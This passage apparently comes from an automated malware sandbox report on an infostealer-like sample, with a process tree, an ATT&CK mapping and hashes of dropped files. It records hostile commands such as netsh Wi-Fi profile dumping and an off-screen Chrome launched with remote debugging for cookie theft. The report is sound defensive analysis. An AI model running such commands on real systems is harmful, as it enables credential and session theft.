      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5768
  - - C:\Windows\SysWOW64\findstr.exe
      findstr All
      4⤵
      System Location Discovery: System Language Discovery
      PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5708
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:4408
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:3428
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Loads dropped DLL
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:5720
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa387cdcf8,0x7ffa387cdd04,0x7ffa387cdd10
      4⤵
      Loads dropped DLL
      PID:2028
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2012,i,13127910758337563700,567214118417609699,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2008 /prefetch:2
      4⤵
      PID:1828
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2264,i,13127910758337563700,567214118417609699,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2272 /prefetch:3
      4⤵
      Loads dropped DLL
      PID:6088
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,13127910758337563700,567214118417609699,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2656 /prefetch:8
      4⤵
      PID:1208
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3264,i,13127910758337563700,567214118417609699,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3276 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5572
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3284,i,13127910758337563700,567214118417609699,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3312 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4252
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4384,i,13127910758337563700,567214118417609699,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4400 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:5752
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4848,i,13127910758337563700,567214118417609699,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3132 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5256
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - outlook_office_path
  - outlook_win_path
  PID:6420
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:224
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      PID:5660
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:920
  - - C:\Windows\SysWOW64\findstr.exe
      findstr All
      4⤵
      System Location Discovery: System Language Discovery
      PID:452
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3340
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:888
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:6828
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:5228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa3ef2dcf8,0x7ffa3ef2dd04,0x7ffa3ef2dd10
      4⤵
      PID:5708
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,941682138350312664,790714330062817804,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:3
      4⤵
      PID:6088
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2504,i,941682138350312664,790714330062817804,262144 --variations-seed-version --mojo-platform-channel-handle=2496 /prefetch:2
      4⤵
      PID:6328
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2104,i,941682138350312664,790714330062817804,262144 --variations-seed-version --mojo-platform-channel-handle=2600 /prefetch:8
      4⤵
      PID:708
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,941682138350312664,790714330062817804,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:8
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,941682138350312664,790714330062817804,262144 --variations-seed-version --mojo-platform-channel-handle=3300 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:6640
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4376,i,941682138350312664,790714330062817804,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  2⤵
  PID:6228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  2⤵
  PID:2520

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4080

C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
- Loads dropped DLL
PID:888

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
- Loads dropped DLL
PID:6012

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
- Loads dropped DLL
PID:4296

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:464

C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
1⤵
- Executes dropped EXE
PID:3696

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5928 -ip 5928
1⤵
PID:4384

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1516 -ip 1516
1⤵
PID:5596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BFIDGHDB

Filesize
228KB

MD5
2d9e9947e691c743b50773d39851b5ec

SHA1
6cd9ce9dc6200426e854e71b3e3a5e929d6b88a6

SHA256
53ea0997497d157f36abc52f50c8a4996b58fad2426ff0d020afaec9f5063cdf

SHA512
28c99bb1bea62b67a82a67aa7099046ac1972ce29ed92db3e134bdf56c59adc8b819d6ac8d213f305f748a4fc77bb43822a9dcb629b506b58b71da892170cdec

Download Submit
C:\ProgramData\HDAKJDHIEBFIIDGDGDBAEGCGDA

Filesize
96KB

MD5
6066c07e98c96795ecd876aa92fe10f8

SHA1
f73cbd7b307c53aaae38677d6513b1baa729ac9f

SHA256
33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

SHA512
7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

Download Submit
C:\ProgramData\HDAKJDHIEBFIIDGDGDBAEGCGDA

Filesize
5.0MB

MD5
c35a97428fe73cf11872f070a1d41796

SHA1
bf70c8e6a32d26aff9d2d39f760d556a0e9f7086

SHA256
e9d80a9880d5fb8ef3e90061da8b2065b2e4f517453b0d2e317b4c15e95c1599

SHA512
cfd80784087e5eeabc3fe2296a09685ab85f179febc9c669e050f42a4c73168427f6c8b2e06141c6d6d8bb8e2a7689d335eab439f512b21f03fd7697e27dc823

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin:.repos

Filesize
1.2MB

MD5
b7ccd69f4bc2bf9e9c02261adbc1e46f

SHA1
c92c65758a0ca89a76a247a8f1759625e2976a97

SHA256
5ae024b5c1b4bc7e28f74022c03d3a3f2ffef2b336259fab67adb0b9f48076cd

SHA512
4d48c43ddfb7dd1d1a7709651e4cb16050fbe663a46887c2c67b0ef0d2908cb62b858814bc32b2a0396a16b73bbba62459a32fc28480554d1cd7fd6eb2262713

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
13e85db7ab7bd0131b6d7b372eb6b3cb

SHA1
5bd031c1d79faee9f5b180576fb2ba73afd236a9

SHA256
96bf5616e02db2a7d71c4eb64ee4bf0ca8a06700e34ffa47bdc9c02f97092e20

SHA512
63e735544156689c62d6d5cffe428e6cf749066239e69dae910f08b89aa9f87efbeaf9ba5fa16d2644d16478ee854903270d4e330ddf89ea1bae6d54c98cb029

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

Filesize
44KB

MD5
bc70c6f94054537721a9579229888f72

SHA1
7a590d1f92f5b1626173623009ab3c29b5e4d757

SHA256
532265d9352abf500fc8c340201aaaf4ac8c218b6122496bb73ae076d32c5004

SHA512
ee328c2929003b897a4a4fadd345686621eed8692c9274eb7ef7b5830c2dbe743b3b29b0ce26ef1852209420d3194bea8745109ac24ab00e04aeeb3af2919662

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
79KB

MD5
65964c0f58109a86bd6ee42e665fff35

SHA1
e407ffaf285d7969949e7493882ba7cf9ecb5cc7

SHA256
436e2752b58ae88f5d83c690e9d3b5ccff525c9472dba4c085312b577c937e53

SHA512
0de20ead878cf0abec56a48f2905011e0c52756fb8e246eb3de404323e64272c2fc0b3793b1497a4e4178340600bbca5cbfc9f5c17d4f63b9d097a73c3a70f44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
998db8a9f40f71e2f3d9e19aac4db4a9

SHA1
dade0e68faef54a59d68ae8cb3b8314b6947b6d7

SHA256
1b28744565eb600485d9800703f2fb635ecf4187036c12d47f86bbd1e078e06b

SHA512
0e66fd26a11507f78fb1b173fd50555dbd95b0d330e095cdd93206757c6af2780ece914a11a23cd4c840636a59470f44c6db35fa392303fb583806264e652016

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
20cac677312eeb22651f96dfee2cd09b

SHA1
2d929a61a8d0a3eebecc80481fa7d3af6ef672ef

SHA256
0bae0d694e9b9f2a532ea586f7954ec567fdb6176d7b222e8ec12ca55e95ce70

SHA512
a1ebb8be6d58ae8124421d812039e790b9fda52a1d76d3cc6cae8f4f7777a7910331633cc1fad759f40d5663b34c52ae8817eacd785cfbe2eae8b5abe77cff94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
36KB

MD5
5b80187e5c1c3f1dc67cbe842066156d

SHA1
555a608c31ad334bb4e93f10ddbf477c4f3f9685

SHA256
c17e79c2eff2d143b480739c5aa265eb849320c6753bfdeb266cf6478a2296c7

SHA512
1474b17fe42a4d1083a57d458339e024b0684d0b6c8da00a4a0825d31560c88a0298adb35557c6efe4cb999a72df423d631607e3dac7d56e8cc493b79013d9eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
327B

MD5
cb321f047d1904b4aca5f3705b47556e

SHA1
d77d6b66999e6d464cbde570685ab387eb50ba84

SHA256
8854b40127a4b692f552b6a8dce9c0fb6ff1e1d6a90934438478760cae2fd331

SHA512
ca0d18f2a7cd39911b7c00a9e6bdba4a05d44ddf33eab54bbe11da376b2252a5119316d86fc2f0dd89bd02357297b855669b3844458a00fbaf27649967852e98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c12ff9d7-cc2f-46ee-899b-e224ae90ff54.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
41KB

MD5
7c6f003047fb56b30b4e889a612e14ae

SHA1
2f028634c5dc9e51a9e4df3441e368a0ce713bc6

SHA256
1e37438b0b142146d70a7d89671179c240af25e3c27d8e7abc8af643e76b0072

SHA512
1d55c728a9a0a62be0010874f819b6e3e51e6c827bcc517faf1ca15d7e6cccebdb9f0997286fc77ff6c0f6a9e8411bace8cb8a84d40265483c2f5cf491a74a3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
d91ca789ecb66676ac03ab7f4ad2d7b5

SHA1
e23f954a4026b15ddbff458f05dc81a9493198fc

SHA256
2c711685e034aaaa2306f4f86f275774e1db2c91060434ec9f7b029c4b573829

SHA512
32cf95f6dbfceaac535b76554abc574daae3f72e6c5518f06f9a5e2544bf49f7d5124f4e0a0db758ae5efdc887d5cc982d472d292d82cbcfe59850d042190be5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Filesize
2KB

MD5
745d48ecb93fd5d0ef7562e75659145e

SHA1
27779bf2519935faca99e5e6ce7544be597b534b

SHA256
f836a5d825cf3d58f4ef1bd584c8f1718f733eb7a15583aca4bac7115fefb5a1

SHA512
3935aa6b99b647939f0f18b4f3d03fdb49411ea5c075188ec5194e01700d6d11a4948303ce341672067a18c43032deebaf5b37adc4ca35ea5ef7e7c5b819ce1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\I11VJ0E7\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE

Filesize
1.8MB

MD5
e854131d04c8dd3c20fb5ec7431cc775

SHA1
e4e589efb8a7ab77e1268c3e6cbb106cfe1da2b8

SHA256
6f645e790819c767d31820730e7dc6d980911c53b8c72a9f6bf58fc496bdc882

SHA512
841f5e4f4199ce8bdd14e665ebbad981fb10396d9bbf58453e01bb04c2548865734cdc2c782baa2e7e1b2ce7f4900a2ce8019a8fe82ac743e0512404a59ca8a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe

Filesize
1.7MB

MD5
6d7adc96b310e80799325edca02ff778

SHA1
35d97327d3d1c5ce920051d0552b2ee510bb919d

SHA256
e5186a04536313599bea259d6fefac44b168d81e08dcc36e54b2c6ff08374efd

SHA512
feb351fa6d4f4d342ff8456812fd2c9dfba8122b94e6c2d11ec4b045f4975d9f0dc2b6388d9e4c6d4ab98287bc6dc56369e5c96f10cf0b62ad7a2f81ba821212

Download Submit
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe

Filesize
1.1MB

MD5
3928c62b67fc0d7c1fb6bcce3b6a8d46

SHA1
e843b7b7524a46a273267a86e320c98bc09e6d44

SHA256
630e00afe98ad4c1db391b74a84b7822a3abb3867a34f2ba163a8bf26d8d4397

SHA512
1884b125c89e32b6e5924e87ad9af827ae7e950ac80411e00a58c465eed88060af72142f9c512e0323e1ade46061f56a5247351e1c1d5e268f2ba35b5e447857

Download Submit
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe

Filesize
2.0MB

MD5
28b543db648763fac865cab931bb3f91

SHA1
b6688b85d6c6d1bd45a3db2d108b6acf7467b0b4

SHA256
701b7ef0b368ddbe9e3d2ddaaaf10284287f38799e536336dc4c821930f13906

SHA512
7d514fc036efc8d57d400e7e84f5b565f40dc0f74a536c708b3fe5d6725e5d4541157e29f514e0706fad6d4159e0b863bedf757eca4df3e87927e462502a02d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe

Filesize
7.6MB

MD5
42277eb580583267e806b62b451f3405

SHA1
3e85e59060a704d43cb3ae77a4cf9de20e833ae6

SHA256
80f85b0e619f749963f048db9f82e9b0213365abc031f3bc087b749e3dd00cb9

SHA512
fc20320e494d41e6041a0f444ddfdc00850e5afe99f2648857eabd6e9ee24b207bfb89dce4fba6c0931dcb6fe12c3c3ca781ecbdaee27bab21bbe4858a5639b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe

Filesize
1.2MB

MD5
646254853368d4931ced040b46e9d447

SHA1
c9e4333c6feb4f0aeedf072f3a293204b9e81e28

SHA256
5a6764d23bb3d50f08f15b95e214a6dca0afb78e7416a21b72982c3649a49e9e

SHA512
485f252cd358ea41be648e013dc3ddeee1e57f8dea3ef42a5c8236a9769e7ebcf8bae1d5a36f55b6fb2cdcbbcf1878eca7d7885b63445cb081688a9512512819

Download Submit
C:\Users\Admin\AppData\Local\Temp\10362200101\73a0821db9.exe

Filesize
2.0MB

MD5
bffde777cecbc7dc9d68347fb135960d

SHA1
cee10d9e1c719c977a73ab2abd1070929a0112d9

SHA256
ae5f0705164a30a02ddb2042a1b1e8f3eb65cff714d8ed2990707cac03e82e6a

SHA512
68f4619914b6d7068c0d78b0d76275630fc7403e9bfeda9fe45f0884401cea04f220bf1706380b237ff1f81a9e7acda995d8c4820141ffa28926ad7dcc7ea761

Download Submit
C:\Users\Admin\AppData\Local\Temp\10374380101\feb9141ed1.exe

Filesize
655KB

MD5
a5d54aec929d9e29b3d1f6fa41be18d3

SHA1
ff930ca08e51c881e715368278dc2b40025ed8ad

SHA256
